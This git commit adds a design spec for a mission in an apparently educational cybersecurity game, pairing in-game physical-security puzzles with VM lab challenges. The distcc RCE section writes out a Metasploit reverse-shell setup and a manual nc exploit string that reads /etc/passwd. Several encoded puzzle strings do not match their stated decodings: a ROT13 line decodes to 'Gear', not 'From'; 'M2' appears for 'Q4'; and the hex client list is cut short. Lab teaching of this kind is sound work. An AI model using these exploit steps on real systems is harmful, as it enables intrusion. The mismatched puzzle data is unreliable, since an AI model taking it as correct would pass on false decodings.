Complete Mission 3 Stage 0 technical challenges specification

Added comprehensive technical challenges breakdown (600+ lines):

Break Escape In-Game Challenges:

1. RFID Keycard Cloning (NEW MECHANIC)
   - Proximity-based (2 GU range, 10-second window)
   - Visual feedback: Progress bar, particle effects, audio cues
   - Success: Cloned keycard added to inventory
   - Alternative: Social engineering (victoria_trust >= 40)
   - Tutorial: Agent 0x99 pre-mission briefing
   - Educational: RFID vulnerabilities, proximity attacks
   - Implementation: Proximity detection, progress tracking, inventory integration

2. Lockpicking (Reinforced from M1-M2)
   - 4 locks: IT cabinet (easy), executive office (medium), security room (medium), safe (PIN)
   - Safe combo: 2010 (WhiteHat founding year)
   - Clues: Reception plaque, computer file
   - Skill reinforcement, no tutorial needed
   - Contains: LORE Fragment 2 (Exploit Catalog)

3. Guard Patrol Stealth (Reinforced from M2)
   - Night security guard, 4-waypoint patrol (60s loop)
   - LOS: 150px range, 120° cone
   - Detection states: Unaware → Alert → Suspicious → Hostile
   - Strategies: Timing-based stealth, social engineering, distraction
   - Educational: Operational security, pattern recognition

4. Social Engineering (Advanced)
   - Victoria Sterling: Influence system (50 start, 40+ for bypasses)
   - Trust unlocks: Office info (30+), server access (40+), double agent (80+)
   - James Park: Information extraction (office layout, schedules, security)
   - Night Guard: Cover story validation
   - Educational: Trust exploitation, corporate infiltration

5. Multi-Encoding Puzzle
   - Message 1: ROT13 whiteboard ("MEET WITH THE ARCHITECT...")
   - Message 2: Hex client list (Ransomware Inc, Critical Mass, Social Fabric)
   - Message 3: Base64 email (ProFTPD exploit pricing)
   - Message 4: Double-encoded USB (ROT13 + Base64 nested - Architect's directives)
   - Discovery: Conference room, Victoria's computer, email, desk drawer
   - Educational: Pattern recognition, multi-stage decoding, persistence
   - CAMPAIGN REVEAL: First direct Architect communication!

VM/SecGen Challenges (Information Gathering: Scanning):

1. Network Port Scanning
   - Tool: nmap
   - Target: 192.168.100.50
   - Output: Ports 21 (FTP), 22 (SSH), 80 (HTTP), 3632 (distcc)
   - Flag: flag{network_scan_complete}
   - Educational: Port scanning, service enumeration
   - Difficulty: Easy

2. Banner Grabbing (FTP)
   - Tool: netcat, ftp
   - Banner reveals: Client codename "GHOST" (M2 connection!)
   - Flag: flag{ftp_intel_gathered}
   - Educational: Intelligence from banners, netcat fundamentals
   - Difficulty: Easy

3. HTTP Service Analysis
   - HTML contains Base64 in comment
   - Encoded: ZmxhZ3twcmljaW5nX2ludGVsX2RlY29kZWR9
   - Decoded: flag{pricing_intel_decoded}
   - Educational: Web reconnaissance, Base64 (reinforced)
   - Connects: Victoria's pricing email
   - Difficulty: Medium

4. distcc Exploitation (CVE-2004-2687)
   - Vulnerability: distcc daemon RCE
   - Tools: Metasploit or manual exploitation
   - Shell access → operational logs
   - CRITICAL REVEAL: ProFTPD sold to Ghost for $12,500 (M2 hospital!)
   - Flag: flag{distcc_legacy_compromised}
   - Educational: Legacy exploitation, CVE research, RCE
   - Difficulty: Advanced

Challenge Integration Matrix:
- 9 challenges total (5 in-game, 4 VM)
- Difficulty: Easy → Advanced scaling
- Educational: NSS, SS, ACS, SOC, HF, AB knowledge areas
- Unlocks: Server access, intel, LORE, M2 connection, Architect reveal

Difficulty Scaling:
- Easy: 5s RFID, slower guard, tutorial VM
- Normal: 10s RFID, standard guard, all encoding types
- Hard: 15s RFID, fast guard, additional obfuscation

Educational Assessment Rubric:
 Network reconnaissance (port scanning, service enumeration)
 Service exploitation (distcc CVE-2004-2687, Metasploit)
 Encoding analysis (ROT13, Hex, Base64, nested decoding)
 Intelligence correlation (physical + digital evidence)
 Physical security (RFID, lockpicking, stealth, social engineering)

Implementation Priority:
- Phase 1: RFID, guard, VM challenges, drop-site integration
- Phase 2: Social engineering, encoding puzzle, LORE, safe
- Phase 3: Tutorials, scaling, alternative paths, feedback

Status: Stage 0 technical challenges COMPLETE 
Next: narrative_themes.md, hybrid_architecture_plan.md
This commit is contained in:
Z. Cliffe Schreuders
2026-01-14 09:46:31 +00:00
parent 88e00f4a8d
commit 7c9d471eaf

View File

@@ -0,0 +1,812 @@
# Mission 3: Technical Challenges Detailed Breakdown
**Mission:** Ghost in the Machine
**Stage:** 0 - Scenario Initialization
**Document:** Technical Challenges Specification
**Date:** 2025-12-24
---
## Overview
This document provides detailed specifications for all technical challenges in Mission 3, covering both Break Escape in-game mechanics and VM/SecGen challenges. Each challenge includes implementation details, educational objectives, difficulty scaling, and integration with the hybrid architecture.
---
## Break Escape In-Game Challenges
### Challenge 1: RFID Keycard Cloning (NEW MECHANIC)
#### Specification
**Challenge Type:** Physical Security Bypass
**Difficulty:** Intermediate
**Required Equipment:** RFID Cloner Device (provided by SAFETYNET)
**Target:** Victoria Sterling's executive keycard
#### Mechanic Details
**Cloning Method: Proximity-Based**
- **Activation:** Player equips RFID cloner device from inventory
- **Range:** 2 Game Units (GU) proximity to Victoria Sterling
- **Duration:** 10-second uninterrupted clone window
- **Visual Feedback:**
- Progress bar overlay (0-100% over 10 seconds)
- On-screen message: "Cloning RFID signature... X%"
- Particle effect around Victoria's keycard (subtle blue glow)
- Audio cue: Low electronic beeping during cloning
**Success Conditions:**
- Remain within 2 GU of Victoria for full 10 seconds
- Victoria doesn't move out of range
- Player not interrupted by guard patrol
- Victoria doesn't detect player behavior (suspicion mechanic)
**Failure Conditions:**
- Player moves out of range before 10 seconds complete
- Victoria moves away (normal walking behavior)
- Guard enters room and detects suspicious behavior
- Victoria's suspicion exceeds threshold (if implemented)
**Result:**
- Success: `victoria_keycard_clone` item added to inventory
- Failure: Must retry (no penalty, can attempt multiple times)
**Alternative Path: Social Engineering**
- If `victoria_trust >= 40`, Victoria grants server room access willingly
- Dialogue option: "I'd like to see your training infrastructure firsthand"
- Victoria: "Of course! Here's a temporary access card for our server room."
- Bypasses RFID cloning entirely (social engineering path)
#### Tutorial Integration
**Agent 0x99 Pre-Mission Briefing:**
> "Here's an RFID cloner. When you meet Victoria Sterling, stay close to her during conversation. The cloner has a 2-meter range. It'll take about 10 seconds to copy her keycard signature. Watch for the progress indicator. If she walks away, you'll need to re-engage.
>
> Alternatively, if you can build enough trust, she might grant you access voluntarily. Your call."
**First-Time Use Prompt:**
- On-screen: "Hold SPACE to activate RFID Cloner"
- Tutorial overlay: "Stay within range (2 GU) for 10 seconds"
- Progress bar appears with countdown timer
**Educational Context:**
- Teaches RFID security vulnerabilities
- Demonstrates proximity-based attacks
- Shows physical security bypass techniques
- Real-world relevance: Hotel room keycards, office access badges
#### Implementation Notes
**Technical Requirements:**
- Proximity detection system (check distance every tick)
- Progress tracking (accumulate time in range, reset if broken)
- Visual feedback system (progress bar, particle effects)
- Audio feedback (beeping during clone, success chime)
- Inventory integration (add cloned card item)
- Door unlock integration (cloned card works on server room RFID reader)
**Edge Cases:**
- What if player saves/loads during cloning? Reset progress
- What if Victoria is in conversation with another NPC? Cloning still possible
- What if guard sees cloning animation? Count as suspicious behavior
- What if player attempts to clone multiple times? Allow unlimited retries
**Difficulty Scaling:**
- Easy Mode: 5-second clone window, 3 GU range
- Normal Mode: 10-second clone window, 2 GU range
- Hard Mode: 15-second clone window, 1.5 GU range, Victoria moves more frequently
---
### Challenge 2: Lockpicking (Reinforced from M1-M2)
#### Locks in Mission 3
**Lock 1: IT Filing Cabinet**
- **Difficulty:** Easy
- **Location:** IT office (daytime accessible)
- **Contains:** Client list documents, password sticky notes
- **Educational:** Reinforces lockpicking from M1
- **Tutorial:** Brief reminder if player hasn't lockpicked recently
**Lock 2: Executive Office Door**
- **Difficulty:** Medium
- **Location:** Executive hallway (nighttime only)
- **Unlocks:** Access to Victoria Sterling's workspace
- **Contains:** Safe, computer with encoded files, whiteboard
- **Alternative:** Victoria grants access if trust >= 40 (social engineering)
**Lock 3: Security Room Door**
- **Difficulty:** Medium
- **Location:** Security hallway (nighttime only)
- **Unlocks:** Backup server room keycard (alternative to RFID cloning)
- **Contains:** Security logs, backup keycard
- **Purpose:** Fail-safe if RFID cloning unsuccessful
**Lock 4: Executive Safe**
- **Difficulty:** PIN-based (not lockpicking)
- **Location:** Victoria's office
- **Combination:** 2010 (WhiteHat Security founding year)
- **Clues:**
- Reception plaque: "WhiteHat Security Services - Founded 2010"
- Computer file: "Safe combo in founding year"
- **Contains:** LORE Fragment 2 (Exploit Catalog)
#### Lockpicking Progression
**Skill Reinforcement:**
- Players should be comfortable with lockpicking by M3
- No tutorial needed unless player skipped M1-M2
- Medium difficulty introduces timing complexity
- Success builds confidence for future missions
**Failure Consequences:**
- Failed lockpick: No penalty, can retry
- Detected by guard while lockpicking: Mission risk (stealth challenge)
- Breaking lockpick: Not implemented (player frustration mitigation)
---
### Challenge 3: Guard Patrol Stealth (Reinforced from M2)
#### Guard Specification
**Guard Profile:**
- **Name:** Night Security Guard
- **Patrol Route:** Hallway circuit (4 waypoints)
- **Behavior:** Methodical, predictable, professional
- **Detection:** Line-of-sight (LOS) based
**Patrol Route:**
```
Waypoint 1: (5, 2) Reception entrance - 15-tick pause
↓ (30 ticks travel)
Waypoint 2: (15, 2) Executive hallway - 15-tick pause
↓ (30 ticks travel)
Waypoint 3: (25, 2) Server room hallway - 20-tick pause
↓ (30 ticks travel)
Waypoint 4: (15, 8) IT hallway - 15-tick pause
↓ (30 ticks travel)
Loop back to Waypoint 1
Total Loop Time: ~180 ticks (~60 seconds at 3 ticks/second)
```
**Line of Sight:**
- **Range:** 150 pixels (~7.5 GU)
- **Angle:** 120° cone in facing direction
- **Visualize:** Red cone overlay (debug mode), subtle tension effect (gameplay)
**Detection States:**
1. **Unaware (0%):** Normal patrol
2. **Alert (1-50%):** "Did I see something?" - Pauses, looks around
3. **Suspicious (51-90%):** "Who's there?" - Investigates last known position
4. **Hostile (91-100%):** "INTRUDER!" - Calls backup, mission risk
**Player Detected Consequences:**
- First detection: Guard questions player
- Player can use cover story (social engineering check)
- Player can flee (restart stealth)
- Player can bribe (if implemented)
- Second detection: Guard calls backup
- Mission risk increases
- Timer starts (5 minutes to complete mission)
- Third detection: Mission failed
- "Security breach detected. Extraction aborted."
#### Stealth Strategies
**Strategy 1: Timing-Based Stealth (Recommended)**
- Observe guard patrol pattern
- Wait for guard to patrol away from target area
- Move during guard's pause at far waypoint
- Use 15-20 tick windows for quick actions (lockpicking, computer access)
**Strategy 2: Social Engineering**
- High influence with Victoria: Guard informed player is authorized
- Guard: "Ms. Sterling mentioned you'd be here. Carry on."
- Bypasses stealth challenge entirely
**Strategy 3: Distraction (Not Implemented in M3)**
- Reserved for future missions
- Could involve triggering alarms elsewhere, throwing objects, etc.
**Educational Objective:**
- Teaches operational security awareness
- Pattern recognition (guard patrol timing)
- Risk assessment (when to move vs. wait)
- Reinforces patience and observation
---
### Challenge 4: Social Engineering (Advanced)
#### NPC Targets
**Victoria Sterling (Primary Target)**
**Influence System:**
- **Starting Influence:** 50 (neutral - potential client)
- **Trust Threshold:** 40+ for alternative paths
- **Max Influence:** 100
**Influence Modifiers:**
| Dialogue Choice | Influence Change |
|----------------|------------------|
| "I'm impressed by your security methodology" | +10 |
| "What makes WhiteHat different from competitors?" | +5 |
| "I've researched your vulnerability disclosure process" | +15 |
| "I need to see your infrastructure firsthand" | -5 (suspicious) |
| "Your prices seem high compared to industry standard" | -10 |
| Demonstrate technical knowledge | +10 |
| Ask suspicious questions | -15 |
**Trust-Based Unlocks:**
- **Trust >= 30:** Victoria shares office layout information
- **Trust >= 40:** Victoria grants server room access (skip RFID cloning)
- **Trust >= 60:** Victoria hints at "special clients" (criminal intel)
- **Trust >= 80:** Victoria offers to recruit player (double agent reveal)
**James Park (Secondary Target)**
**Role:** Information source, innocent employee
**Influence System:** Basic (0-100, starts at 30)
**Information Extraction:**
| Topic | Influence Required | Information Gained |
|-------|-------------------|-------------------|
| Office layout | 20+ | Map of rooms and departments |
| Victoria's schedule | 40+ | "She usually leaves by 6 PM" |
| Security procedures | 50+ | Guard patrol timing, keycard access |
| Server room location | 30+ | "Third floor, east wing" |
| Client information | 60+ | "We work with some high-profile clients..." |
**Innocent Employee Dynamic:**
- James genuinely believes WhiteHat is legitimate
- Building trust provides intel but creates moral complexity
- If player exposes firm, James faces consequences
- Influences "protect James" moral choice later
**Night Security Guard (Tertiary Target)**
**Cover Story Validation:**
- If detected, guard challenges player
- Social engineering check (influence-based)
**Guard Dialogue:**
> "Hold on. This area is restricted after hours. Who are you?"
**Player Options:**
1. **"I'm working late with Ms. Sterling's authorization"** (victoria_trust >= 40 required)
- Guard: "Let me verify..." [Calls Victoria]
- If Victoria vouches: "Alright, carry on. Just stay in authorized areas."
- If Victoria doesn't vouch: Mission risk
2. **"I'm a consultant doing a security audit"** (Influence check >= 25)
- Success: Guard believes cover story temporarily
- Failure: Guard suspicious, calls supervisor
3. **"Sorry, I got lost looking for the bathroom"** (Weak excuse, -20 influence)
- Guard: "Bathrooms are downstairs. I'll escort you."
- Forced to leave area, must re-infiltrate
4. **Run away** (Stealth challenge failed)
- Guard calls backup, mission timer starts
**Educational Objective:**
- Social engineering tactics (trust building, cover stories)
- Manipulation vs. deception ethics
- Corporate environment infiltration
- Real-world phishing/pretexting parallels
---
### Challenge 5: Multi-Encoding Puzzle
#### Encoded Messages in Mission 3
**Message 1: ROT13 Whiteboard**
**Location:** Conference room whiteboard (photographable)
**Difficulty:** Easy
**Encoding:** ROT13
**Encoded Text:**
```
ZRRG JVGU GUR NEPUVGRPG - CEVBEVGVMR VASENFGEHPGHER RKCYBVGF
```
**Decoded Text:**
```
MEET WITH THE ARCHITECT - PRIORITIZE INFRASTRUCTURE EXPLOITS
```
**Discovery Method:**
- Visible during daytime reconnaissance
- Can photograph with in-game camera
- Player decodes using CyberChef workstation (server room)
**Educational Value:**
- Introduces ROT13 (classic Caesar cipher)
- Pattern recognition: All caps, English-looking text
- Teaches: Encoding vs. encryption distinction
---
**Message 2: Hex-Encoded Client List**
**Location:** Victoria's computer (executive office)
**Difficulty:** Medium
**Encoding:** Hexadecimal
**Encoded Text:**
```
5a45524f20444159205359 4e44494341544520434c49454e5420524f53544552
434c49454e54533a
52616e736f6d7761726520496e636f72706f7261746564
437269746963616c204d617373
536f6369616c204661627269
```
**Decoded Text:**
```
ZERO DAY SYNDICATE CLIENT ROSTER
CLIENTS:
Ransomware Incorporated
Critical Mass
Social Fabric
```
**Discovery Method:**
- Access Victoria's computer (requires executive office access)
- File named "CLIENT_LIST.txt" (hex content)
- Player copies hex, decodes at CyberChef
**Educational Value:**
- Hexadecimal encoding fundamentals
- ASCII to hex conversion understanding
- Pattern recognition: 2-character hex pairs (4E, 20, etc.)
---
**Message 3: Base64 Email Draft**
**Location:** Victoria's email client (computer)
**Difficulty:** Medium
**Encoding:** Base64
**Encoded Text:**
```
RnJvbTogVmljdG9yaWEgU3RlcmxpbmcKVG86IENpcGhlcgpTdWJqZWN0OiBRMyBQcmljaW5nIFVwZGF0ZQoKQ2lwaGVyLAoKUTMgZXhwbG9pdCBwcmljaW5nIHVwZGF0ZWQ6CgpDUklUSUNBTDogJDM1LDAwMCBiYXNlCkhJR0g6ICQxOCwwMDAgYmFzZQpNRURJVU06ICQ3LDUwMCBiYXNlCgpIZWFsdGhjYXJlIHByZW1pdW06ICszMCUKRW5lcmd5IHNlY3RvcjogKzQwJQoKUHJvRlRQRCBleHBsb2l0IHNvbGQgdG8gUmFuc29td2FyZSBJbmMgZm9yICQxMiw1MDAgKGhlYWx0aGNhcmUgcHJlbWl1bSkuCgotIFZpY3Rvcmlh
```
**Decoded Text:**
```
From: Victoria Sterling
To: Cipher
Subject: Q3 Pricing Update
Cipher,
Q3 exploit pricing updated:
CRITICAL: $35,000 base
HIGH: $18,000 base
MEDIUM: $7,500 base
Healthcare premium: +30%
Energy sector: +40%
ProFTPD exploit sold to Ransomware Inc for $12,500 (healthcare premium).
- Victoria
```
**Discovery Method:**
- Drafts folder in Victoria's email client
- Player copies Base64 string
- Decodes at CyberChef workstation
**Educational Value:**
- Base64 encoding (reinforced from M2)
- Email forensics
- Intelligence gathering from communications
- **CRITICAL REVEAL:** ProFTPD exploit sold to Ransomware Inc (M2 connection!)
---
**Message 4: Double-Encoded USB Drive**
**Location:** Hidden USB drive in Victoria's desk drawer (lockpick required)
**Difficulty:** Advanced
**Encoding:** ROT13 + Base64 (nested)
**Encoded Text (Layer 1 - Base64):**
```
R2VhejogR3VyIE5lcHV2Z3JwZydmIEVldmpyZXZpcnJmCgpQdW5ndWUsIFJhbmdlcmUgZXJzY2ViZ2VndnJhIGN5YnZiZXZndnJmIHNiZSBNMjoKCjEuIFZBU0VORkhHRVBHSFVSIFJLQ0dCV0dGIChDRVZCRVZHTCkKICAgU2JwaCZmdCBiYSBhcnJnYXBuZXIgZnJwZ2J5IEZQTlFOIGZsZmdyemYKICAgUmFyeXRsIHR5dnEgVlBGIGlocGFyZW9uYXZnbHZyZgoKMi4gUEVCRkYtUFJZWSBQQkJFUVZBTkdWQkEKICAgQ2ViaXZxciBFbmFmYmJ6bmpyZSBWYXAgamdudiBhcm5ndWFwbmVyIGdjZ3lidmdmCiAgIEZicHZueSBTbm9ldnAgamdjZ3lidmdnIGVicmd5bnZhZyBuYXEgcmFyeXRsIGhndnl2Z2xyZg==
```
**Decoded Text (Layer 1 - Base64 to ROT13):**
```
Trne: Gur Nepuvgrpg'f Qverpgvirf
Pvcure, Sbegure rkcybvgngvba cevbevgvrf sbe M2:
1. VASENFGEHPGHER RKCYBVGF (CEVBEVGL)
Sbphf ba urnygupher frpgbe FPNQN flfgrzf
Raretl tevq VPF ihyarenov
yvgvrf
2. PEBFF-PRYY PBBOPVARQVBA
Cebivqr Enasbzjner Vap jvgu ubfcvgny gnetrgarq rpbabzl cnpxntrf
3. BIRENAGVBANY FRPHEVGL
JuvgrUng Frphevgl sebag zhfg eranva pbaivaprq
Ivpgbevn Fgreyvat nhgubevmrq gb erpehvg qbhoyr ntragf
- Gur Nepuvgrpg
```
**Decoded Text (Layer 2 - ROT13 to Plaintext):**
```
From: The Architect's Directives
Cipher, Future exploitation priorities for Q4:
1. INFRASTRUCTURE EXPLOITS (PRIORITY)
Focus on healthcare sector SCADA systems
Energy grid ICS vulnerabilities
2. CROSS-CELL COORDINATION
Provide Ransomware Inc with hospital targeted economy packages
3. OPERATIONAL SECURITY
WhiteHat Security front must remain convinced
Victoria Sterling authorized to recruit double agents
- The Architect
```
**Discovery Method:**
1. Lockpick Victoria's desk drawer (executive office)
2. Find hidden USB drive
3. Insert USB into computer
4. File contains Base64 string
5. Decode Base64 → reveals ROT13 text
6. Decode ROT13 → reveals plaintext
**Educational Value:**
- Multi-stage decoding (critical thinking)
- Nested encoding patterns
- Advanced CyberChef workflows
- Persistence in cryptanalysis
- **CAMPAIGN REVEAL:** First direct communication from The Architect!
---
## VM/SecGen Challenges
### SecGen Scenario: "Information Gathering: Scanning"
**Network:** 192.168.100.0/24 (Zero Day training network)
**Target Host:** 192.168.100.50
**Services:** FTP (21), SSH (22), HTTP (80), distcc (3632)
---
### VM Challenge 1: Network Port Scanning
**Objective:** Scan Zero Day's training network to identify open ports and services
**Tools:** nmap
**Command Examples:**
```bash
# Basic scan
nmap 192.168.100.50
# Service version detection
nmap -sV 192.168.100.50
# Full scan with OS detection
nmap -A 192.168.100.50
# Scan entire subnet
nmap 192.168.100.0/24
```
**Expected Output:**
```
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.100.50
Host is up (0.00045s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4
80/tcp open http Apache httpd 2.4.6
3632/tcp open distcc distccd v1
Nmap done: 1 IP address (1 host up) scanned in 2.43 seconds
```
**Flag:** `flag{network_scan_complete}`
**Submission:** Drop-site terminal in server room
**Educational Objectives:**
- Understand port scanning fundamentals
- Identify common port numbers (21=FTP, 22=SSH, 80=HTTP)
- Service version detection with -sV flag
- Network mapping methodology
**In-Game Integration:**
- Agent 0x99 tutorial: "Start with nmap to map the network. Look for open ports and service versions."
- Drop-site terminal displays simplified nmap results with annotations
- Flag submission unlocks server room workstation access
**Difficulty:** Easy
---
### VM Challenge 2: Banner Grabbing (FTP Service)
**Objective:** Connect to FTP service and extract intelligence from banner
**Tools:** netcat (nc), ftp
**Command:**
```bash
# Netcat banner grab
nc 192.168.100.50 21
# Or using FTP client
ftp 192.168.100.50
```
**Banner Output:**
```
220 (vsFTPd 3.0.3)
220 Zero Day Syndicate Training Network
220 INTEL: Client codename "GHOST" - Last connection 2024-05-15
220 flag{ftp_intel_gathered}
```
**Flag:** `flag{ftp_intel_gathered}`
**Submission:** Drop-site terminal
**Educational Objectives:**
- Banner grabbing for intelligence gathering
- FTP service enumeration
- Information leakage from service banners
- Netcat fundamentals
**In-Game Integration:**
- Banner text reveals client codename "GHOST" (M2 antagonist!)
- Connects to Ransomware Incorporated
- Unlocks client codename list document in-game
**Difficulty:** Easy
---
### VM Challenge 3: HTTP Service Analysis + Base64 Decoding
**Objective:** Analyze HTTP service and decode Base64-encoded flag in HTML
**Tools:** curl, wget, browser, base64
**Command:**
```bash
# Fetch HTTP page
curl http://192.168.100.50
# Or view source in browser
wget -O - http://192.168.100.50
```
**HTML Output:**
```html
<!DOCTYPE html>
<html>
<head><title>WhiteHat Security Services</title></head>
<body>
<h1>Training Network - Authorized Personnel Only</h1>
<p>Welcome to the Zero Day Syndicate training environment.</p>
<!-- Pricing Intel (Encoded): ZmxhZ3twcmljaW5nX2ludGVsX2RlY29kZWR9 -->
<p>Contact admin@whitehat-sec.local for access.</p>
</body>
</html>
```
**Decoding:**
```bash
echo "ZmxhZ3twcmljaW5nX2ludGVsX2RlY29kZWR9" | base64 -d
# Output: flag{pricing_intel_decoded}
```
**Flag:** `flag{pricing_intel_decoded}`
**Submission:** Drop-site terminal
**Educational Objectives:**
- HTTP service analysis
- HTML source code examination
- Base64 decoding (reinforced from M2)
- Hidden data in web services
**In-Game Integration:**
- Decoded flag reveals pricing intelligence
- Connects to Victoria's email about exploit pricing
- Unlocks exploit catalog LORE fragment
**Difficulty:** Medium
---
### VM Challenge 4: distcc Exploitation (CVE-2004-2687)
**Objective:** Exploit distcc vulnerability to gain shell access and find operational logs
**Vulnerability:** distcc daemon RCE (CVE-2004-2687)
**Tools:** Metasploit, manual exploitation
**Method 1: Metasploit**
```bash
msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS 192.168.100.50
set RPORT 3632
set PAYLOAD cmd/unix/reverse
set LHOST [your IP]
set LPORT 4444
exploit
```
**Method 2: Manual Exploitation**
```bash
# distcc allows arbitrary command execution
nc 192.168.100.50 3632
DIST00000001ARGC00000002ARGV00000006/bin/shARGV0000000D-c
ARGV00000015id; cat /etc/passwd
```
**Shell Access:**
```bash
# Once shell obtained
cd /var/logs/zeroday
cat operational_log.txt
# Contents reveal:
# ProFTPD exploit (CVE-2010-4652) sold to Ransomware Incorporated
# Client: "Ghost" - St. Catherine's Hospital target
# Payment: $12,500 (healthcare sector premium)
# flag{distcc_legacy_compromised}
```
**Flag:** `flag{distcc_legacy_compromised}`
**Submission:** Drop-site terminal
**Educational Objectives:**
- Legacy service exploitation
- CVE research and exploitation
- Remote code execution techniques
- Metasploit framework usage
- Post-exploitation enumeration
**In-Game Integration:**
- **CRITICAL REVEAL:** Operational logs show M2 hospital attack connection!
- Player discovers: "Zero Day sold the exploit used in Mission 2!"
- Unlocks "aha moment" dialogue with Agent 0x99
- Sets up closing debrief revelation
**Difficulty:** Advanced
---
## Challenge Integration Matrix
| Challenge | Type | Difficulty | Unlocks | Educational Focus |
|-----------|------|------------|---------|-------------------|
| RFID Cloning | In-Game | Intermediate | Server room access | Physical security, proximity attacks |
| Lockpicking | In-Game | Easy-Medium | Executive office, safe | Physical security (reinforced) |
| Guard Stealth | In-Game | Medium | Undetected infiltration | Operational security, timing |
| Social Engineering | In-Game | Intermediate | Alternative paths, intel | Trust exploitation, cover stories |
| Multi-Encoding | In-Game | Medium-Advanced | LORE fragments, intel | ROT13, Hex, Base64, nested decoding |
| Network Scanning | VM | Easy | Network map, access | Port scanning, service enumeration |
| Banner Grabbing | VM | Easy | Client codenames | Intelligence gathering, netcat |
| HTTP Analysis | VM | Medium | Pricing intel | Web reconnaissance, Base64 |
| distcc Exploit | VM | Advanced | M2 connection reveal | Legacy exploitation, RCE, CVE research |
---
## Difficulty Scaling Options
### Easy Mode
- RFID clone: 5 seconds, 3 GU range
- Guard patrol: Slower, 200px LOS
- Lockpicking: Easier timing windows
- Encoding: ROT13 and Base64 only (skip Hex, nested encoding)
- VM: Tutorial mode with guided commands
### Normal Mode (Default)
- RFID clone: 10 seconds, 2 GU range
- Guard patrol: Standard (60s loop, 150px LOS)
- Lockpicking: Medium difficulty
- Encoding: All types including nested
- VM: Standard challenges
### Hard Mode
- RFID clone: 15 seconds, 1.5 GU range, Victoria moves more
- Guard patrol: Faster, 120px LOS, erratic timing
- Lockpicking: Harder timing, limited lockpicks
- Encoding: Additional obfuscation layers
- VM: No hints, advanced exploitation required
---
## Educational Assessment Rubric
**Network Reconnaissance (NSS):**
- ✅ Can explain purpose of port scanning
- ✅ Identifies common ports (21, 22, 80, 3632)
- ✅ Understands service enumeration via banners
- ✅ Applies nmap for network mapping
**Service Exploitation (SS):**
- ✅ Recognizes legacy service vulnerabilities
- ✅ Researches CVEs (CVE-2004-2687)
- ✅ Applies exploitation tools (Metasploit)
- ✅ Conducts post-exploitation enumeration
**Encoding Analysis (ACS):**
- ✅ Distinguishes ROT13, Hex, Base64
- ✅ Decodes multi-stage nested encoding
- ✅ Recognizes encoding patterns
- ✅ Uses CyberChef effectively
**Intelligence Correlation (SOC):**
- ✅ Combines physical + digital evidence
- ✅ Recognizes patterns across data sources
- ✅ Correlates M2 connection (ProFTPD exploit sale)
- ✅ Systematic investigation approach
**Physical Security (General):**
- ✅ Understands RFID vulnerabilities
- ✅ Lockpicking techniques (reinforced)
- ✅ Stealth and timing awareness
- ✅ Social engineering for bypass
---
## Implementation Priority
**Phase 1 (Critical Path):**
1. RFID cloning mechanics (new system)
2. Guard patrol integration (reinforced from M2)
3. VM challenges (network scan, banner grab, distcc)
4. Drop-site terminal integration
**Phase 2 (Enhanced Experience):**
5. Social engineering paths (Victoria trust system)
6. Multi-encoding puzzle (CyberChef integration)
7. LORE fragment placement
8. Safe PIN puzzle (2010 clue system)
**Phase 3 (Polish):**
9. Tutorial overlays (RFID, network scan)
10. Difficulty scaling options
11. Alternative path balancing
12. Educational feedback system
---
**Document Status:** ✅ COMPLETE
**Next Document:** narrative_themes.md
**Integration:** Ready for Stage 1 (Narrative Structure)
---